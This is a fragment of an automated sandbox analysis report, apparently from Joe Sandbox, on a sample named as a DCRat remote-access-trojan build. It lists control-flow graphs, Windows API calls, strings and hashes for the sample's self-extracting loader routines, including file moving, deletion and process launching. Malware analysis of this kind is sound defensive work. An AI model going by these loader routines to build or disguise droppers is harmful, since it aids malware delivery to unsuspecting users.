315 74055a 312->315 313->303 315->303 323 740667-740669 ExitProcess 317->323 324 74061c-740661 GetCurrentProcessId AttachConsole call 7535b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->324 318->323 324->323
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 007400E4
                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007400F6
                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00740127
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007403D4
                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007403F0
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00740402
                                        • ReadFile.KERNEL32(00000000,?,00007FFE,00763BA4,00000000), ref: 00740421
                                        • CloseHandle.KERNEL32(00000000), ref: 00740479
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0074048F
                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 007404E7
                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00740510
                                        • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0074054A
                                          • Part of subcall function 00740085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007400A0
                                          • Part of subcall function 00740085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0073EB86,Crypt32.dll,00000000,0073EC0A,?,?,0073EBEC,?,?,?), ref: 007400C2
                                        • _swprintf.LIBCMT ref: 007405BE
                                        • _swprintf.LIBCMT ref: 0074060A
                                          • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
                                        • AllocConsole.KERNEL32 ref: 00740612
                                        • GetCurrentProcessId.KERNEL32 ref: 0074061C
                                        • AttachConsole.KERNEL32(00000000), ref: 00740623
                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00740649
                                        • WriteConsoleW.KERNEL32(00000000), ref: 00740650
                                        • Sleep.KERNEL32(00002710), ref: 0074065B
                                        • FreeConsole.KERNEL32 ref: 00740661
                                        • ExitProcess.KERNEL32 ref: 00740669
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                        • String ID: <v$ ?v$(>v$(@v$0Av$4=v$8<v$<?v$@>v$@@v$D=v$DAv$DXGIDebug.dll$P<v$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;v$T?v$X>v$X@v$\Av$`=v$dwmapi.dll$kernel32$l<v$p>v$p?v$p@v$uxtheme.dll$x=v$|<v$>v$?v
                                        • API String ID: 1201351596-2610461605
                                        • Opcode ID: 6258c024e13521660677933e76301fe7eee1c880495f01cc971cf9afadc9c908
                                        • Instruction ID: c4a280c5cc85e9a064f3e9ba4321f8eefceb215d5f4b434207aaf25175f6c833
                                        • Opcode Fuzzy Hash: 6258c024e13521660677933e76301fe7eee1c880495f01cc971cf9afadc9c908
                                        • Instruction Fuzzy Hash: 25D164B1508384ABD7319F50D849B9FB7E8FB85704F00492DFA8A96151DBBC8648CFA6

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 406 74bdf5-74be0d call 74e28c call 74e360 411 74ca90-74ca9d 406->411 412 74be13-74be3d call 74aa36 406->412 412->411 415 74be43-74be48 412->415 416 74be49-74be57 415->416 417 74be58-74be6d call 74a6c7 416->417 420 74be6f 417->420 421 74be71-74be86 call 7417ac 420->421 424 74be93-74be96 421->424 425 74be88-74be8c 421->425 427 74ca5c-74ca87 call 74aa36 424->427 428 74be9c 424->428 425->421 426 74be8e 425->426 426->427 427->416 439 74ca8d-74ca8f 427->439 430 74c074-74c076 428->430 431 74c115-74c117 428->431 432 74c132-74c134 428->432 433 74bea3-74bea6 428->433 430->427 437 74c07c-74c088 430->437 431->427 434 74c11d-74c12d SetWindowTextW 431->434 432->427 436 74c13a-74c141 432->436 433->427 438 74beac-74bf06 call 749da4 call 73b965 call 73a49d call 73a5d7 call 7370bf 433->438 434->427 436->427 440 74c147-74c160 436->440 441 74c09c-74c0a1 437->441 442 74c08a-74c09b call 757168 437->442 495 74c045-74c05a call 73a52a 438->495 439->411 446 74c162 440->446 447 74c168-74c176 call 7535b3 440->447 444 74c0a3-74c0a9 441->444 445 74c0ab-74c0b6 call 74ab9a 441->445 442->441 451 74c0bb-74c0bd 444->451 445->451 446->447 447->427 460 74c17c-74c185 447->460 457 74c0bf-74c0c6 call 7535b3 451->457 458 74c0c8-74c0e8 call 7535b3 call 7535de 451->458 457->458 483 74c101-74c103 458->483 484 74c0ea-74c0f1 458->484 464 74c187-74c18b 460->464 465 74c1ae-74c1b1 460->465 464->465 469 74c18d-74c195 464->469 471 74c296-74c2a4 call 73fe56 465->471 472 74c1b7-74c1ba 465->472 469->427 475 74c19b-74c1a9 call 73fe56 469->475 485 74c2a6-74c2ba call 7517cb 471->485 477 74c1c7-74c1e2 472->477 478 74c1bc-74c1c1 472->478 475->485 496 74c1e4-74c21e 477->496 497 74c22c-74c233 477->497 478->471 478->477 483->427 486 74c109-74c110 call 7535ce 483->486 490 74c0f3-74c0f5 484->490 491 74c0f8-74c100 call 757168 484->491 505 74c2c7-74c318 call 73fe56 call 74a8d0 GetDlgItem SetWindowTextW SendMessageW call 7535e9 485->505 506 74c2bc-74c2c0 485->506 486->427 490->491 491->483 512 74c060-74c06f call 73a4b3 495->512 513 74bf0b-74bf1f SetFileAttributesW 495->513 523 74c220 496->523 524 74c222-74c224 496->524 499 74c235-74c24d call 7535b3 497->499 500 74c261-74c284 call 7535b3 * 2 497->500 499->500 517 74c24f-74c25c call 73fe2e 499->517 500->485 534 74c286-74c294 call 73fe2e 500->534 542 74c31d-74c321 505->542 506->505 511 74c2c2-74c2c4 506->511 511->505 512->427 519 74bfc5-74bfd5 GetFileAttributesW 513->519 520 74bf25-74bf58 call 73b4f7 call 73b207 call 7535b3 513->520 517->500 519->495 529 74bfd7-74bfe6 DeleteFileW 519->529 549 74bf5a-74bf69 call 7535b3 520->549 550 74bf6b-74bf79 call 73b925 520->550 523->524 524->497 529->495 533 74bfe8-74bfeb 529->533 537 74bfef-74c01b call 73400a GetFileAttributesW 533->537 534->485 546 74bfed-74bfee 537->546 547 74c01d-74c033 MoveFileW 537->547 542->427 543 74c327-74c33b SendMessageW 542->543 543->427 546->537 547->495 551 74c035-74c03f MoveFileExW 547->551 549->550 556 74bf7f-74bfbe call 7535b3 call 74f350 549->556 550->512 550->556 551->495 556->519
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0074BDFA
                                          • Part of subcall function 0074AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0074AAFE
                                        • SetWindowTextW.USER32(?,?), ref: 0074C127
                                        • _wcsrchr.LIBVCRUNTIME ref: 0074C2B1
                                        • GetDlgItem.USER32(?,00000066), ref: 0074C2EC
                                        • SetWindowTextW.USER32(00000000,?), ref: 0074C2FC
                                        • SendMessageW.USER32(00000000,00000143,00000000,0077A472), ref: 0074C30A
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0074C335
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                        • API String ID: 3564274579-312220925
                                        • Opcode ID: ec21cc87a1285f999ae0e90aefc4385b2d0d4c68b96ebf1ea414e0e8349da879
                                        • Instruction ID: b794782627b58911b9a63382639116b431c8b87f00a63a00f82347bdac7ed9e0
                                        • Opcode Fuzzy Hash: ec21cc87a1285f999ae0e90aefc4385b2d0d4c68b96ebf1ea414e0e8349da879
                                        • Instruction Fuzzy Hash: 34E16472D00118EADB26DBA4DC49DEF77BCAF09351F1040A6FA09E3051EB789E88CB54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 561 73d341-73d378 call 74e28c call 74e360 call 7515e8 568 73d3ab-73d3b4 call 73fe56 561->568 569 73d37a-73d3a9 GetModuleFileNameW call 73bc85 call 73fe2e 561->569 572 73d3b9-73d3dd call 739619 call 7399b0 568->572 569->572 580 73d3e3-73d3eb 572->580 581 73d7a0-73d7a6 call 739653 572->581 583 73d409-73d438 call 755a90 * 2 580->583 584 73d3ed-73d405 call 743781 * 2 580->584 585 73d7ab-73d7bb 581->585 594 73d43b-73d43e 583->594 595 73d407 584->595 596 73d444-73d44a call 739e40 594->596 597 73d56c-73d58f call 739d30 call 7535d3 594->597 595->583 601 73d44f-73d476 call 739bf0 596->601 606 73d595-73d5b0 call 739bf0 597->606 597->581 607 73d535-73d538 601->607 608 73d47c-73d484 601->608 622 73d5b2-73d5b7 606->622 623 73d5b9-73d5cc call 7535d3 606->623 612 73d53b-73d55d call 739d30 607->612 610 73d486-73d48e 608->610 611 73d4af-73d4ba 608->611 610->611 614 73d490-73d4aa call 755ec0 610->614 615 73d4e5-73d4ed 611->615 616 73d4bc-73d4c8 611->616 612->594 626 73d563-73d566 612->626 637 73d52b-73d533 614->637 638 73d4ac 614->638 620 73d519-73d51d 615->620 621 73d4ef-73d4f7 615->621 616->615 618 73d4ca-73d4cf 616->618 618->615 625 73d4d1-73d4e3 call 755808 618->625 620->607 628 73d51f-73d522 620->628 621->620 627 73d4f9-73d513 call 755ec0 621->627 629 73d5f1-73d5f8 622->629 623->581 642 73d5d2-73d5ee call 74137a call 7535ce 623->642 625->615 643 73d527 625->643 626->581 626->597 627->581 627->620 628->608 633 73d5fa 629->633 634 73d5fc-73d625 call 73fdfb call 7535d3 629->634 633->634 651 73d633-73d649 634->651 652 73d627-73d62e call 7535ce 634->652 637->612 638->611 642->629 643->637 654 73d731-73d757 call 73ce72 call 7535ce * 2 651->654 655 73d64f-73d65d 651->655 652->581 692 73d771-73d79d call 755a90 * 2 654->692 693 73d759-73d76f call 743781 * 2 654->693 658 73d664-73d669 655->658 659 73d66f-73d678 658->659 660 73d97c-73d984 658->660 662 73d684-73d68b 659->662 663 73d67a-73d67e 659->663 664 73d72b-73d72e 660->664 665 73d98a-73d98e 660->665 667 73d691-73d6b6 662->667 668 73d880-73d891 call 73fcbf 662->668 663->660 663->662 664->654 669 73d990-73d996 665->669 670 73d9de-73d9e4 665->670 674 73d6b9-73d6de call 7535b3 call 755808 667->674 694 73d897-73d8c0 call 73fe56 call 755885 668->694 695 73d976-73d979 668->695 675 73d722-73d725 669->675 676 73d99c-73d9a3 669->676 672 73d9e6-73d9ec 670->672 673 73da0a-73da2a call 73ce72 670->673 672->673 679 73d9ee-73d9f4 672->679 697 73da02-73da05 673->697 711 73d6e0-73d6ea 674->711 712 73d6f6 674->712 675->658 675->664 682 73d9a5-73d9a8 676->682 683 73d9ca 676->683 679->675 687 73d9fa-73da01 679->687 690 73d9c6-73d9c8 682->690 691 73d9aa-73d9ad 682->691 686 73d9cc-73d9d9 683->686 686->675 687->697 690->686 699 73d9c2-73d9c4 691->699 700 73d9af-73d9b2 691->700 692->581 693->692 694->695 720 73d8c6-73d93c call 741596 call 73fdfb call 73fdd4 call 73fdfb call 7558d9 694->720 695->660 699->686 705 73d9b4-73d9b8 700->705 706 73d9be-73d9c0 700->706 705->679 713 73d9ba-73d9bc 705->713 706->686 711->712 717 73d6ec-73d6f4 711->717 718 73d6f9-73d6fd 712->718 713->686 717->718 718->674 721 73d6ff-73d706 718->721 754 73d94a-73d95f 720->754 755 73d93e-73d947 720->755 723 73d7be-73d7c1 721->723 724 73d70c-73d71a call 73fdfb 721->724 723->668 726 73d7c7-73d7ce 723->726 728 73d71f 724->728 730 73d7d0-73d7d4 726->730 731 73d7d6-73d7d7 726->731 728->675 730->731 733 73d7d9-73d7e7 730->733 731->726 735 73d7e9-73d7ec 733->735 736 73d808-73d830 call 741596 733->736 739 73d805 735->739 740 73d7ee-73d803 735->740 743 73d853-73d85b 736->743 744 73d832-73d84e call 7535e9 736->744 739->736 740->735 740->739 747 73d862-73d87b call 73dd6b 743->747 748 73d85d 743->748 744->728 747->728 748->747 756 73d960-73d967 754->756 755->754 757 73d973-73d974 756->757 758 73d969-73d96d 756->758 757->756 758->728 758->757
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0073D346
                                        • _wcschr.LIBVCRUNTIME ref: 0073D367
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0073D328,?), ref: 0073D382
                                        • __fprintf_l.LIBCMT ref: 0073D873
                                          • Part of subcall function 0074137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0073B652,00000000,?,?,?,00050160), ref: 00741396
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                        • String ID: $ ,$$%s:$$9v$*messages***$*messages***$@%s:$R$RTL$a
                                        • API String ID: 4184910265-4018081767
                                        • Opcode ID: 18a0360bd3899229a44323775fe4a7e28b6e645425bfd674812193b6c8e6cf60
                                        • Instruction ID: eb5f6b471a5b15a4d07421419f26b9e5ff38ff419ef1bda4bc0ba800739a5cd4
                                        • Opcode Fuzzy Hash: 18a0360bd3899229a44323775fe4a7e28b6e645425bfd674812193b6c8e6cf60
                                        • Instruction Fuzzy Hash: 3C12A1B1900219DAEB35DFA4EC95BEEB7B5EF04700F104569F506A7192EB78AE44CB20

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0074AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0074AC85
                                          • Part of subcall function 0074AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0074AC96
                                          • Part of subcall function 0074AC74: IsDialogMessageW.USER32(00050160,?), ref: 0074ACAA
                                          • Part of subcall function 0074AC74: TranslateMessage.USER32(?), ref: 0074ACB8
                                          • Part of subcall function 0074AC74: DispatchMessageW.USER32(?), ref: 0074ACC2
                                        • GetDlgItem.USER32(00000068,0078ECB0), ref: 0074CB6E
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0074A632,00000001,?,?,0074AECB,00764F88,0078ECB0), ref: 0074CB96
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0074CBA1
                                        • SendMessageW.USER32(00000000,000000C2,00000000,007635B4), ref: 0074CBAF
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0074CBC5
                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0074CBDF
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0074CC23
                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0074CC31
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0074CC40
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0074CC67
                                        • SendMessageW.USER32(00000000,000000C2,00000000,0076431C), ref: 0074CC76
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                        • String ID: \
                                        • API String ID: 3569833718-2967466578
                                        • Opcode ID: f70e4baa1d7c31b82d82a448125ca6dc7b50661154d35ce623861ec79bd11a41
                                        • Instruction ID: 38ea3d3f6a99c56aa8c937c38600c1d345b0715dc96ccfef6c4392be21c7fad6
                                        • Opcode Fuzzy Hash: f70e4baa1d7c31b82d82a448125ca6dc7b50661154d35ce623861ec79bd11a41
                                        • Instruction Fuzzy Hash: B431F371285742BFD301EF24DC8AFAB7FACEB42704F00450AF65196192DB684906C7BA

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 795 74ce22-74ce3a call 74e360 798 74ce40-74ce4c call 7535b3 795->798 799 74d08b-74d093 795->799 798->799 802 74ce52-74ce7a call 74f350 798->802 805 74ce84-74ce91 802->805 806 74ce7c 802->806 807 74ce95-74ce9e 805->807 808 74ce93 805->808 806->805 809 74ced6 807->809 810 74cea0-74cea2 807->810 808->807 812 74ceda-74cedd 809->812 811 74ceaa-74cead 810->811 813 74ceb3-74cebb 811->813 814 74d03c-74d041 811->814 815 74cee4-74cee6 812->815 816 74cedf-74cee2 812->816 817 74d055-74d05d 813->817 818 74cec1-74cec7 813->818 819 74d036-74d03a 814->819 820 74d043 814->820 821 74cef9-74cf0e call 73b493 815->821 822 74cee8-74ceef 815->822 816->815 816->821 825 74d065-74d06d 817->825 826 74d05f-74d061 817->826 818->817 823 74cecd-74ced4 818->823 819->814 824 74d048-74d04c 819->824 820->824 830 74cf27-74cf32 call 73a180 821->830 831 74cf10-74cf1d call 7417ac 821->831 822->821 827 74cef1 822->827 823->809 823->811 824->817 825->812 826->825 827->821 837 74cf34-74cf4b call 73b239 830->837 838 74cf4f-74cf5c ShellExecuteExW 830->838 831->830 836 74cf1f 831->836 836->830 837->838 840 74cf62-74cf6f 838->840 841 74d08a 838->841 843 74cf71-74cf78 840->843 844 74cf82-74cf84 840->844 841->799 843->844 847 74cf7a-74cf80 843->847 845 74cf86-74cf8f 844->845 846 74cf9b-74cfba call 74d2e6 844->846 845->846 854 74cf91-74cf99 ShowWindow 845->854 848 74cff1-74cffd CloseHandle 846->848 865 74cfbc-74cfc4 846->865 847->844 847->848 851 74d00e-74d01c 848->851 852 74cfff-74d00c call 7417ac 848->852 855 74d01e-74d020 851->855 856 74d079-74d07b 851->856 852->851 862 74d072 852->862 854->846 855->856 860 74d022-74d028 855->860 856->841 859 74d07d-74d07f 856->859 859->841 863 74d081-74d084 ShowWindow 859->863 860->856 864 74d02a-74d034 860->864 862->856 863->841 864->856 865->848 866 74cfc6-74cfd7 GetExitCodeProcess 865->866 866->848 867 74cfd9-74cfe3 866->867 868 74cfe5 867->868 869 74cfea 867->869 868->869 869->848
                                        APIs
                                        • ShellExecuteExW.SHELL32(?), ref: 0074CF54
                                        • ShowWindow.USER32(?,00000000), ref: 0074CF93
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 0074CFCF
                                        • CloseHandle.KERNEL32(?), ref: 0074CFF5
                                        • ShowWindow.USER32(?,00000001), ref: 0074D084
                                          • Part of subcall function 007417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0073BB05,00000000,.exe,?,?,00000800,?,?,007485DF,?), ref: 007417C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                        • String ID: $.exe$.inf
                                        • API String ID: 3686203788-2452507128
                                        • Opcode ID: e91081d0fe670465e8cbe41dc164371652b0128363ae67d90c999970ff5b9d25
                                        • Instruction ID: c55ae2d3e45c5cef2bb90c3b07e89da2fb5b58ee652da63f3776400895a5b2e9
                                        • Opcode Fuzzy Hash: e91081d0fe670465e8cbe41dc164371652b0128363ae67d90c999970ff5b9d25
                                        • Instruction Fuzzy Hash: 7461F571405380EAD7329F24D8146ABBBF9EF81344F04881EF5C597261E7BD8D8ACB66

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 870 75a058-75a071 871 75a087-75a08c 870->871 872 75a073-75a083 call 75e6ed 870->872 873 75a08e-75a096 871->873 874 75a099-75a0bd MultiByteToWideChar 871->874 872->871 879 75a085 872->879 873->874 877 75a250-75a263 call 74ec4a 874->877 878 75a0c3-75a0cf 874->878 880 75a0d1-75a0e2 878->880 881 75a123 878->881 879->871 884 75a0e4-75a0f3 call 761a30 880->884 885 75a101-75a112 call 758518 880->885 883 75a125-75a127 881->883 887 75a245 883->887 888 75a12d-75a140 MultiByteToWideChar 883->888 884->887 897 75a0f9-75a0ff 884->897 885->887 898 75a118 885->898 892 75a247-75a24e call 75a2c0 887->892 888->887 891 75a146-75a158 call 75a72c 888->891 899 75a15d-75a161 891->899 892->877 901 75a11e-75a121 897->901 898->901 899->887 902 75a167-75a16e 899->902 901->883 903 75a170-75a175 902->903 904 75a1a8-75a1b4 902->904 903->892 905 75a17b-75a17d 903->905 906 75a1b6-75a1c7 904->906 907 75a200 904->907 905->887 908 75a183-75a19d call 75a72c 905->908 910 75a1e2-75a1f3 call 758518 906->910 911 75a1c9-75a1d8 call 761a30 906->911 909 75a202-75a204 907->909 908->892 925 75a1a3 908->925 915 75a206-75a21f call 75a72c 909->915 916 75a23e-75a244 call 75a2c0 909->916 910->916 924 75a1f5 910->924 911->916 922 75a1da-75a1e0 911->922 915->916 928 75a221-75a228 915->928 916->887 927 75a1fb-75a1fe 922->927 924->927 925->887 927->909 929 75a264-75a26a 928->929 930 75a22a-75a22b 928->930 931 75a22c-75a23c WideCharToMultiByte 929->931 930->931 931->916 932 75a26c-75a273 call 75a2c0 931->932 932->892
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00754E35,00754E35,?,?,?,0075A2A9,00000001,00000001,3FE85006), ref: 0075A0B2
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0075A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0075A138
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0075A232
                                        • __freea.LIBCMT ref: 0075A23F
                                          • Part of subcall function 00758518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0075C13D,00000000,?,007567E2,?,00000008,?,007589AD,?,?,?), ref: 0075854A
                                        • __freea.LIBCMT ref: 0075A248
                                        • __freea.LIBCMT ref: 0075A26D
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 18a7409a5595200e2ede103ef1f34a1a5caa517cb136c27e31c1d7c63feed3d9
                                        • Instruction ID: 91aac2349d8bfc2fc612b7114ce2da0bf982a44781c67b67299cf099dbfc1c29
                                        • Opcode Fuzzy Hash: 18a7409a5595200e2ede103ef1f34a1a5caa517cb136c27e31c1d7c63feed3d9
                                        • Instruction Fuzzy Hash: 0251C172A10206BFDB258E64CC46EFB77A9EB84751F144739FC05D6140EBBADC48C6A2

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00740085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007400A0
                                          • Part of subcall function 00740085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0073EB86,Crypt32.dll,00000000,0073EC0A,?,?,0073EBEC,?,?,?), ref: 007400C2
                                        • OleInitialize.OLE32(00000000), ref: 0074A34E
                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0074A385
                                        • SHGetMalloc.SHELL32(00778430), ref: 0074A38F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                        • String ID: riched20.dll$3Ro
                                        • API String ID: 3498096277-3613677438
                                        • Opcode ID: 293e0e8c78ccb74d89a00eb3a64161d8167c3699a035b62a955a04207c365b10
                                        • Instruction ID: 3c6cbb1aed4e4cdf811cd7835ad384bd56976c837937228cb688991537b5c2e2
                                        • Opcode Fuzzy Hash: 293e0e8c78ccb74d89a00eb3a64161d8167c3699a035b62a955a04207c365b10
                                        • Instruction Fuzzy Hash: 38F04FB1C0020DABCB10AF99D8499EFFBFCEF94301F00415BE814E2201CBB846068BA1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
